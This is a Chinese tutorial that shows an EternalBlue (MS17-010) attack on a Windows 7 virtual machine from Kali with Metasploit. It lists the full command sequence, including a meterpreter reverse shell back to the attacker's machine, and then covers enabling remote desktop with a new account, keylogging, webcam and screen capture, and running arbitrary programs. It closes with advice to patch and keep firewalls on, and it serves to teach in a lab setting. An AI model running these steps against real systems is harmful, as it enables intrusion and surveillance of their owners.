現(xiàn)在很多用戶還在使用Win7系統(tǒng)，雖然我個人也非常喜歡Win7，也承認(rèn)這是一款非常經(jīng)典的系統(tǒng)。但是Win7已經(jīng)在今年1月份徹底停止了支持，也就是說永遠(yuǎn)也不會得到安全更新和補(bǔ)丁修復(fù)了。這對用戶來說是極大的危險，如果有條件的話，還是請使用最新版的Win10，并及時更新安全補(bǔ)丁，保護(hù)電腦。

今天就來看看如何利用Kali來對Win7進(jìn)行滲透。這里使用的工具是大名鼎鼎的Metaspoit，集成了大量漏洞滲透工具。其中自然有臭名昭著的永恒之藍(lán)工具，它利用了Windows系統(tǒng)的SMB漏洞， 漏洞編號是MS17-010。具體原理其實(shí)我也不清楚，但是大家只要知道這些漏洞非常危險就可以了。

準(zhǔn)備工作

準(zhǔn)備工作很簡單，一個Win7虛擬機(jī)和一個Kali虛擬機(jī)即可。為了讓Kali能夠成功滲透，Win7系統(tǒng)需要關(guān)閉防火墻。

關(guān)閉防火墻

掃描漏洞

首先在Kali里啟動Metasploit框架。

msfconsole

啟動成功之后，應(yīng)該會進(jìn)入Metasploit工具的命令行中，提示符為msf5。

Metasploit框架

然后使用掃描工具掃描ms10-010漏洞，RHOSTS填寫Win7虛擬機(jī)的IP地址。

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.229.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

注意工具的運(yùn)行結(jié)果，如果出現(xiàn)了類似綠框中的輸出，那么就說明漏洞掃描成功，可以進(jìn)行下一步的滲透工作了。如果Win7防火墻是開啟的，是無法掃描到漏洞的。這也從另一個側(cè)面來證明防火墻的保護(hù)作用。

掃描結(jié)果

滲透系統(tǒng)

通過掃描證實(shí)了Win7系統(tǒng)中存在漏洞，下一步自然是通過對應(yīng)的滲透工具進(jìn)行滲透。其中RHOSTS是遠(yuǎn)程IP，也就是Win7的IP地址，而LHOSTS是本地Kali系統(tǒng)的IP地址。

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.229.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.229.131
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

稍等片刻，如果滲透成功，那么就會出現(xiàn)meterpreter提示符。這時候可以輸入getuid命令查看一下當(dāng)前系統(tǒng)的用戶。

獲取用戶名

開啟遠(yuǎn)程桌面

滲透成功之后，就可以使用隨心所欲的進(jìn)行各種操作了。如果想要簡單一點(diǎn)，可以開啟遠(yuǎn)程桌面，直接控制目標(biāo)電腦。開啟RDP的時候需要創(chuàng)建一個用戶。

meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456

然后在Kali中打開一個新的終端，輸入命令開啟遠(yuǎn)程桌面。

rdesktop 192.168.229.129

然后輸入上面設(shè)置的用戶名和密碼即可連接到目標(biāo)計(jì)算機(jī)。

開啟遠(yuǎn)程桌面

當(dāng)然，這種方法的問題就是因?yàn)閃indows系統(tǒng)是單用戶的系統(tǒng)，當(dāng)前登錄的用戶會看到遠(yuǎn)程桌面的登錄提示，從而暴露滲透者。

遠(yuǎn)程桌面連接提示

后臺監(jiān)聽

其實(shí)如果滲透成功，進(jìn)入了meterpreter提示符狀態(tài)的話，也不需要這么麻煩。因?yàn)閙eterpreter自帶了很多命令，包括上傳文件、執(zhí)行程序、監(jiān)聽鍵盤鼠標(biāo)攝像頭等等，完全足以獲取目標(biāo)用戶的任何信息。

screenshot命令可以獲取當(dāng)前的系統(tǒng)截圖。

系統(tǒng)截圖

upload命令可以上傳文件，這里我直接把剛剛的屏幕截圖上傳上去了。上傳的目標(biāo)位置在C:\Windows\System32里。

上傳文件

webcam_stream命令可以打開目標(biāo)計(jì)算機(jī)的攝像頭。

監(jiān)控攝像頭

screenshare可以實(shí)時查看用戶的當(dāng)前屏幕內(nèi)容。

查看屏幕內(nèi)容

keyscan命令可以監(jiān)聽用戶的鍵盤操作。

監(jiān)聽鍵盤

最后是execute命令可以執(zhí)行目標(biāo)計(jì)算機(jī)上的任意程序。

執(zhí)行程序

以上這些命令配合使用，即可完成整個滲透過程，從方方面面獲取目標(biāo)用戶的信息。

當(dāng)然，通過本篇內(nèi)容，相比大家也明白了系統(tǒng)漏洞對用戶的危害有多大了吧。為了盡可能的減少漏洞對我們的影響，我推薦大家永遠(yuǎn)使用最新版的操作系統(tǒng)并及時更新安全補(bǔ)丁，不要關(guān)閉更新和防火墻，安裝并確保殺毒軟件正常運(yùn)行，不運(yùn)行奇怪的程序。這樣可以很大程度上避免不法分子黑入我們的電腦。